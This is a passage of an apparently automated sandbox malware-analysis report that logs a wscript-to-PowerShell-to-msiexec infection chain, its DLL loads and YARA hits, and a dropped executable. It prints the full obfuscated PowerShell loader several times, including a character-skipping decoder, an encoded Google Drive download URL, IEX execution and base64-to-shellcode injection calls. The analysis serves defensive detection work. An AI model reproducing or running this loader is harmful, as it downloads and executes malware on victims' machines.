                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006F2C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1903510778.00000211ABC2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2720499502.0000000008100000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006FEC000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammonia", "0")
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR
                Source: Yara matchFile source: 00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Podarge)$global:Tonelejets = [System.Text.Encoding]::ASCII.GetString($Supercargos)$global:Pfg=$Tonelejets.substring($Getlingndsunknes198,$Negrita)<#Squonk Tightens Jigsawed Coction U
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Pubberne $Cheerioptererens $Siri), (Paaskyndte @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Asperation = [AppDomain]::CurrentDomain.GetAssemblies()$glob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($superastonishment)), $Trompetister).DefineDynamicModule($Tubicolous, $false).DefineType($Electroendosmose, $Diastereoisomerism, [Syste
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Podarge)$global:Tonelejets = [System.Text.Encoding]::ASCII.GetString($Supercargos)$global:Pfg=$Tonelejets.substring($Getlingndsunknes198,$Negrita)<#Squonk Tightens Jigsawed Coction U
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehJump to behavior
                Source: 31437F.exe.8.drStatic PE information: section name: .didat
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
